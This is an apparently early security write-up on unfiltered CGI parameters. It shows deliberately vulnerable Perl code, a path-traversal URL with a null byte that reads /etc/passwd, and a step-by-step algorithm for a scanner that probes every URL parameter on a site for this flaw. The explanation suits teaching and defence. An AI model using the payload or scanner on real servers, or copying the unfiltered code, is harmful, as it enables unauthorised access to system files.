CC V

by Samy Kamkar [CommPort5@LucidX.com]

Bug Classification
Improper filtering of CGI parameters

Example and Description
Many CGIs, or Common Gateway Interfaces, are used to retrieve files on the machine running the HTTP daemon and output their data to the user remotely accessing the CGI. The problem with many of these CGIs is that the developers do not include filters on the user input, when it is the user that submits the or part of the name of the file that is accessed. This allows malicious users to read files that they shouldn't have access to, or even execute programs on the machine.

Here is some example perl code of a basic CGI with the common bug of no filtering mechanism to important user input:

---------------------------------------
#!/usr/bin/perl
use CGI qw/:standard/; # standard CGI module
print header; # content-type header
$dir = "htmlfiles"; # directory where the html files would be
$file = param("file"); # input from user
$fullpath = $dir . "/" . $file . ".html"; # create a full path
open(FILE, "<$fullpath"); # opens the file, read-only mode
while () { print } # to print the contents of the file
close(FILE); # close the file
# end of code
---------------------------------------

The problem with this code is that a malicious user is able to read data that s/he shouldn't have access to. An example of this is someone trying to read /etc/passwd. /etc/passwd is a good example of a file to be read since it's almost always readable by any user and is on almost all UNIX-like systems. There are two things that are required, which should be, but aren't, filtered in this program, to allow someone to read a file such as /etc/passwd. One is to escape the directory that the open() statement would normally read in, and second is to escape the ".html" put at the end of the open(). Here is an example of a URL to read the /etc/passwd on a machine running the example CGI: http://server/cgi-bin/the.cgi?file=../../../../../../../../etc/passwd%00 The CGI then reads "htmlfiles/../../../../../../../../etc/passwd\0.html" \0 is the null terminator. The null terminator is what escapes the .html since the open() and many other functions in many languages stop reading inputted data once it reaches a null terminator. And to escape the directory that the open() reads in, we use ../'s.

- Algorithm
1. Spider the website, starting from the root index.
2. Recursively search through all URLs on the web site to find all URLs that are on that machine.
3. Find all URLs in the already-found URLs that contain a '?' and assume that those are the only URLs that are vulnerable to our bug.
4. Find all key and element pairs in each of these URLs and find all URLs with only a key (no '=' in the URL) and consider that key an element.
5. Go through each key and element of each URL and replace each element of each URL with a '../' x 20 . 'etc/passwd%00'.
6. For every element replacement, do a GET request on that URL and match the responses for /root:/.
7. For each response that contains 'root:', decrement the URL by one '../', do a GET request on the new URL, and check the response again to see if it contains a 'root:' repeatedly. Once the response does not contain a 'root:', add one more '../' to the URL and log that URL as an exploitable CGI. Continue element replacement to find any other bugs for other key and element pairs.